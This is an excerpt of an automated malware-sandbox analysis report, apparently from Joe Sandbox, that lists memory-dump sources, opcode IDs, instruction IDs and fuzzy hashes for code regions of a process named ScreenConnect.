                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: c2b6c33bb1a09c699f30d83def6d5a14eb894b7182763c99f7c44c2ba5233979
                                                                                                                                                                                                  • Instruction ID: e6a303afbae3c5c958c06962947fe8614e3fe97c0cbefb0a50db56f45d2784db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2b6c33bb1a09c699f30d83def6d5a14eb894b7182763c99f7c44c2ba5233979
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 278135B2D9CA4B4AEBA9DA2944616BC37E1FF55B80F08407DC45DCF187DE2CB805C242
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 12100005343998cd4a1981e6dca14fe715098d7d8284a9f31f5eeb6f5491ed45
                                                                                                                                                                                                  • Instruction ID: e7d115a61264bfa7b54468ab169578b0f60303aa258069be2c3b20ee67d0fa21
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12100005343998cd4a1981e6dca14fe715098d7d8284a9f31f5eeb6f5491ed45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA31E457E4E6D31EF252956E19950FD2FA0EFA21A0B1C00B7D0A8CF0D3ED0918478361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 6d3e88c51ea7ea93d7f94ae13d8a3212e313dd26a9b0e33efdc4797a51e5b3bd
                                                                                                                                                                                                  • Instruction ID: 85356555e4a685a0cd1a6e023834647cf3b940495507972c78cc89282e34a8dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d3e88c51ea7ea93d7f94ae13d8a3212e313dd26a9b0e33efdc4797a51e5b3bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8331D557E4E6D26AE352956E6D950FD2FA0EFA21A1B1C00B7D0A8CF0D3E909584B8361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 3af88387504a749ed98bd0491a5536cbaa90e0ac7be18aa1648aabc7fbe2735b
                                                                                                                                                                                                  • Instruction ID: 09d89cd5d48900a8e641a12c0bbd4f17a485c26c7aea780a5de66d9e1f914064
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3af88387504a749ed98bd0491a5536cbaa90e0ac7be18aa1648aabc7fbe2735b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8721B157E4E6D36EF252956E19950FD2FA1EFA22A0B1C00B7D0A8CF0D3ED0918478361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: a454dedd6af25cba521cba28a1b8708c33c517139bed1a305a1fa860423c46b0
                                                                                                                                                                                                  • Instruction ID: add3514e21da0bc0937ba6871ab228f90c8cc548bfe399c61ec257223967d6a1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a454dedd6af25cba521cba28a1b8708c33c517139bed1a305a1fa860423c46b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9421D657E4E6D25EF256957E2D954FD2FA1EFA26A0B1C01B7D098CF0D3EC08184B8361
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: 9b5c666257c979f178b64d0e2df466a03142fbf3028ae4f1bf01b3a24404eed6
                                                                                                                                                                                                  • Instruction ID: a84da102b0bece8dd303530a6ec74e7ce3b2ac5ba16cc71a498162995a9f2155
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b5c666257c979f178b64d0e2df466a03142fbf3028ae4f1bf01b3a24404eed6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0010413E4E6826AF35595AE2C550FD2FA5FFA22E1B1C4077D05CCB1C3EC0818468362
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 6B
                                                                                                                                                                                                  • API String ID: 0-2065085838
                                                                                                                                                                                                  • Opcode ID: beddaf38f7bbec374183add3f7dc3681992206e4b523e1c4a453ce154ec799d4
                                                                                                                                                                                                  • Instruction ID: 8e54744127d45a305ac0a8b84d65349060f9f503f83d1db79970fe6dfd6356ed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: beddaf38f7bbec374183add3f7dc3681992206e4b523e1c4a453ce154ec799d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8701F753E4EA922AF25591AA1C595BD1EA5EFA22E1B1C4177E06CCB1C3EC0818468362
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8d6d85d8f08aa4408c50b04bd3690a15b9fe181c320702a40f74e9c14eafbd20
                                                                                                                                                                                                  • Instruction ID: 75e41448ba47786c2a16235aed2545f5e678cc22b8d38a6d5bf270bb9ed69976
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d6d85d8f08aa4408c50b04bd3690a15b9fe181c320702a40f74e9c14eafbd20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17C13933D4CA4A5BEB69EA2994428F977E1FF50390B04057DE44DCB586ED18F80AC3C2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e0ff2a3ec359868a0bdb9ed4b06426dacc089f88990b477dd492e37c58f8b394
                                                                                                                                                                                                  • Instruction ID: 6210c4f54124059afa30f5fe2a45949869522e3307f4a5813832639033e15d1c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0ff2a3ec359868a0bdb9ed4b06426dacc089f88990b477dd492e37c58f8b394
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1B1A036A0CA4A4FDB8DEB68D4916E977B1FF9435472405B9C05DCF187CA29E887C780
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 741b7bca069e73115e154232c5b530d3a86e2bb8ec725237480855cd6c3e0ed4
                                                                                                                                                                                                  • Instruction ID: 1749d886ad5e28f1480fe8ccd0b7b6b34c0c36f2357427c835eb79a93ca65ebd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 741b7bca069e73115e154232c5b530d3a86e2bb8ec725237480855cd6c3e0ed4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8971477166CA0A8FEBA8EB1DC491BB933E2FF58341F640478E55ECB296DD64E805C740
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: c08c1afa86425f0e633aeeeffbb1be824eed9a3e3ef6f250d8b30af6f539f46e
                                                                                                                                                                                                  • Instruction ID: 178358f338ac384802f73dc775d10d1dc02396e84fdc76d7b7fa72bcac04094d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c08c1afa86425f0e633aeeeffbb1be824eed9a3e3ef6f250d8b30af6f539f46e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7671B832E9891F4AE7A9EB2980506FD76F3FF95385F544439D41ECB2C2DE28B842C241
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 817a05d2fbdaf5f88f2c5575694d8a347510d94447dbdf54f41635a15fa96adb
                                                                                                                                                                                                  • Instruction ID: e1a04628cc290a6c1464af56347e04f21d78e1417aafe58d96dd110838a3b4a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 817a05d2fbdaf5f88f2c5575694d8a347510d94447dbdf54f41635a15fa96adb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C516872E9DACA4FE789EA7958555B93BF1FF55380B4844BAC00CCB193DD18A806C382
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a99dea7f6793e79c4af19bb9c21b8ccaa6bb2da7b61bf060f4b2d29d8c87775a
                                                                                                                                                                                                  • Instruction ID: 77b815f8f065bc0e7bf775977c80b7e2fae0a8d39878fc46853b6df0def10c94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a99dea7f6793e79c4af19bb9c21b8ccaa6bb2da7b61bf060f4b2d29d8c87775a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0513973E8DE899FE765EA69A8911ED7BF1FF94340B44117AD04CCB592DF246802C341
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 35f188ee592bf7a4031e1938d4eccf95fbb2a9caecbb4c077d9cc5b3d1054385
                                                                                                                                                                                                  • Instruction ID: 184717a6410f6f093fde2e8beb7caf86f020fe4d1dd12c0e0a66dd4104bb6285
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f188ee592bf7a4031e1938d4eccf95fbb2a9caecbb4c077d9cc5b3d1054385
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C61E372A5CE899FEBC8DE289451AA937E1FF64750F0441BDC45ECB296EE24E842C740
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 76879dc90f95a78137c6af3c0f5f9ae7b5d96fc4c0e1d39ad0d27594b714122e
                                                                                                                                                                                                  • Instruction ID: dc52b0b6c4fd000971e1aa3608b9b962c7bda25dc5ffd7dbffbe944e277d19c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76879dc90f95a78137c6af3c0f5f9ae7b5d96fc4c0e1d39ad0d27594b714122e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3512372D98A4A4BEB98DA6980557BC37E1FF95B90F08447DC45ECB287DE2CB805C342
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 83834fed56f0192e6c465b889fe4840886558ad493fb60cd6e3aa132e2ce3f65
                                                                                                                                                                                                  • Instruction ID: 83f3d34b432574910b66ea2d7107561ac99f9b386ebd895b016cf2ca3e6c5aa2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83834fed56f0192e6c465b889fe4840886558ad493fb60cd6e3aa132e2ce3f65
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F4167B164CA499FDB88DF28C864A6937E1FF59314B2445ADD41ECB2D2CB35E852CB01
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6285a6d5648dc581640765d013a2ea618d9493d55bddbc7dfa0d69380cf9b7ea
                                                                                                                                                                                                  • Instruction ID: a1c6e4f722d10c0db94987fca7776ea5c08249d12ed3383bdc62a8b862f41ebf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6285a6d5648dc581640765d013a2ea618d9493d55bddbc7dfa0d69380cf9b7ea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E231F73394D6525FE742EAADE8911ED7BB0EF5236871800B7D088CE093EA156447C685
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3ff21b2b4c9e4085d1b7dd4875253c8e950b4cf0be153660fa4020c830edc0df
                                                                                                                                                                                                  • Instruction ID: 995d4a9109910f700ba462fec38f87a1c81f39d90347c40cf2198e939feece8e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff21b2b4c9e4085d1b7dd4875253c8e950b4cf0be153660fa4020c830edc0df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA21263394D6564FE742EA6EE8910ED7BB0FF5136871800B7E0C8CF0A3EA156447D681
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3ae955a06911b7dc4abceaf36af8be05b8f56556987dce2998e72e261e90665b
                                                                                                                                                                                                  • Instruction ID: f92899ec7b381a5c053f219f8219f14434cd796d314f79d46d412bbbba946d4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ae955a06911b7dc4abceaf36af8be05b8f56556987dce2998e72e261e90665b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F21BD3658E2956FC3069BA8D8659D93FB0EF8726470901F7D089CB0B3CA1D588AC7A1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cf43b4ddbc6db47a07d6fc2812d1b7e0137ca663819362ae4fcec46ca1db6cf3
                                                                                                                                                                                                  • Instruction ID: 31028d47830e487c63a414a6fbf9cd76cc70c0b51bc2778edb2052fce9a4bcc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf43b4ddbc6db47a07d6fc2812d1b7e0137ca663819362ae4fcec46ca1db6cf3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3213A3294DF894FD7A5EB7598541A97BF1FF85360B4802BAD08DCB192DB2CA802C742
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f46e7d0065a9fa047a557401b47e8a109462a7e53bc59fdad04cf4322497d411
                                                                                                                                                                                                  • Instruction ID: 70393d8092f1d6f659ad440557d661fcdf2a4b787ec102e7209c1f25b61db2e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f46e7d0065a9fa047a557401b47e8a109462a7e53bc59fdad04cf4322497d411
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6511C431608D084FE794EA28E868B7AB3E1FF98355F18057ED84DC72A1DF659C40C741
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 82b71253a63e31140d85d76378279594b97e30dc060aaffedf096a6865df7097
                                                                                                                                                                                                  • Instruction ID: 81ef24c12df54f988a9695e7104ce77663fa12fb1c4ac894d0bff75fba4e0ea1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82b71253a63e31140d85d76378279594b97e30dc060aaffedf096a6865df7097
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611E733F8CD498AFB89A7692C601FC3AE2FF48784F8400BAD41DC75D2CE149A00C245
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7a2237cc11c089e524de379d6380f2b009a467e7680422e40bae49e4158f3983
                                                                                                                                                                                                  • Instruction ID: e566d2781c887594d02d6554152a8950d76874b3b629ae7182752337fe0fe104
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2237cc11c089e524de379d6380f2b009a467e7680422e40bae49e4158f3983
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11D3B6D4CA889FEB95DB755C651AC3FF1FF59300F0540AAD458CB296DA249901C702
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1bb55f5c7e084763c47a7ad338f61ba3e592936e79f175fb6117d77e4a18fe6c
                                                                                                                                                                                                  • Instruction ID: 37146ff5bbd4f61df9a342894fbfb7ae68ddf2c65993a16f02edf127da98917a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bb55f5c7e084763c47a7ad338f61ba3e592936e79f175fb6117d77e4a18fe6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70115E72A48A4A8FDA98EF19C451B6977E1FF54744B1440A9C44DCF286DE28E885CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6d8c0b649f99f4019eb5f2cc18ffd20259882a39bb133fadd3210ad470150a45
                                                                                                                                                                                                  • Instruction ID: cac80952727bb2c1b3d92b1620cdad663ab10f5a4a51f19d51ca376527b53f95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8c0b649f99f4019eb5f2cc18ffd20259882a39bb133fadd3210ad470150a45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0711061698DA574BF769922A84643796AF2FF85380F1940BFD449CA1D3DD2C9C81C341
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 59c3a4d2e5c0e364e876b834016785264e1b2a338cd7288b1ab43d3564710077
                                                                                                                                                                                                  • Instruction ID: 24ea0ae578c2a1b3fca8808e703e707000931b1a91f76f5c1cbc0602ef0fbf05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59c3a4d2e5c0e364e876b834016785264e1b2a338cd7288b1ab43d3564710077
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6116D72A48A4A8FDB88EF29C451B6977E1FF58744B0440A9C44DCF287DE38E845CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cd220a0ad3609469e2a0d1e94287057111271eaa4ffdf7c3214d697fa31d106f
                                                                                                                                                                                                  • Instruction ID: 273c7a9d7c8791237d126b25065b4e9912fd1ddbb6f632b04c22d978a26dccb1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd220a0ad3609469e2a0d1e94287057111271eaa4ffdf7c3214d697fa31d106f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F0653644C69C5FCB42DB64D4518E57FB0FE56310B1501C7E04DCF053E7219A5ACB82
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
